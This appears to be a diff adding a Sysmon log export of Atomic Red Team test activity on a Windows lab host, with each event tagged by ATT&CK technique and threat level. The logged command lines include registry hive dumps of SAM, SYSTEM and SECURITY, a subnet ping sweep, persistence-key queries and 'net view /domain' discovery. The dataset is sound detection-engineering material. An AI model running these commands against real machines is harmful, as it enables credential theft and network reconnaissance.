+ 0x8000000000000000
+
+
+ 3721
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:41.646
+ 747F3D96-D885-5D31-0000-00107F1A3200
+ 2832
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SAM sam.hive"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547779.255338,2019-07-19T18:49:39.255338+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\System system.hive" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3719
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:39.214
+ 747F3D96-D883-5D31-0000-0010839B3100
+ 3904
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg save HKLM\System system.hive"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547773.63255,2019-07-19T18:49:33.632550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\Security security.hive" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3717
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:33.603
+ 747F3D96-D87D-5D31-0000-0010958F3100
+ 1728
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg save HKLM\Security security.hive"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547773.572021,2019-07-19T18:49:33.572021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3715
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:33.541
+ 747F3D96-D87D-5D31-0000-0010FA8A3100
+ 3868
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547773.392501,2019-07-19T18:49:33.392501+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3713
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:33.365
+ 747F3D96-D87D-5D31-0000-0010CA843100
+ 3900
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547773.331942,2019-07-19T18:49:33.331942+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3711
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:33.284
+ 747F3D96-D87D-5D31-0000-00103B803100
+ 324
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547773.251689,2019-07-19T18:49:33.251689+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3709
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:33.209
+ 747F3D96-D87D-5D31-0000-0010B37B3100
+ 3616
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547773.175813,2019-07-19T18:49:33.175813+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3707
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:33.113
+ 747F3D96-D87D-5D31-0000-00102B773100
+ 2148
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547773.059631,2019-07-19T18:49:33.059631+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3705
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:33.019
+ 747F3D96-D87D-5D31-0000-001090723100
+ 196
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.990533,2019-07-19T18:49:32.990533+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3703
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:32.956
+ 747F3D96-D87C-5D31-0000-0010056E3100
+ 4220
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.937862,2019-07-19T18:49:32.937862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3701
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:32.900
+ 747F3D96-D87C-5D31-0000-00107C693100
+ 1740
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.868916,2019-07-19T18:49:32.868916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3699
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:32.842
+ 747F3D96-D87C-5D31-0000-0010E1643100
+ 5936
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.807707,2019-07-19T18:49:32.807707+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3697
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:32.775
+ 747F3D96-D87C-5D31-0000-001056603100
+ 6832
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547895.038554,2019-07-19T18:51:35.038554+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i" )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3773
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:51:34.991
+ 747F3D96-D8F6-5D31-0000-001091D13300
+ 4528
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547895.01476,2019-07-19T18:51:35.014760+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3772
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:51:34.779
+ 747F3D96-D8F6-5D31-0000-00100FCB3300
+ 3344
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1077] Windows Admin Shares - Process - Created,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3771
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:51:22.330
+ 747F3D96-D8EA-5D31-0000-00108AB83300
+ 4684
+ C:\Windows\System32\net.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Net Command
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ net view
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07
+ 747F3D96-D8EA-5D31-0000-001030B63300
+ 1988
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "net view"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1018] Remote System Discovery - Process,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3771
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:51:22.330
+ 747F3D96-D8EA-5D31-0000-00108AB83300
+ 4684
+ C:\Windows\System32\net.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Net Command
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ net view
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07
+ 747F3D96-D8EA-5D31-0000-001030B63300
+ 1988
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "net view"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547882.333688,2019-07-19T18:51:22.333688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "net view" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3770
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:51:22.302
+ 747F3D96-D8EA-5D31-0000-001030B63300
+ 1988
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "net view"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1077] Windows Admin Shares - Process - Created,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3769
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:51:09.839
+ 747F3D96-D8DD-5D31-0000-001043953300
+ 3012
+ C:\Windows\System32\net.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Net Command
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ net view /domain
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07
+ 747F3D96-D8DD-5D31-0000-0010EF923300
+ 4856
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "net view /domain"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1018] Remote System Discovery - Process,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3769
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:51:09.839
+ 747F3D96-D8DD-5D31-0000-001043953300
+ 3012
+ C:\Windows\System32\net.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Net Command
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ net view /domain
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07
+ 747F3D96-D8DD-5D31-0000-0010EF923300
+ 4856
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "net view /domain"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
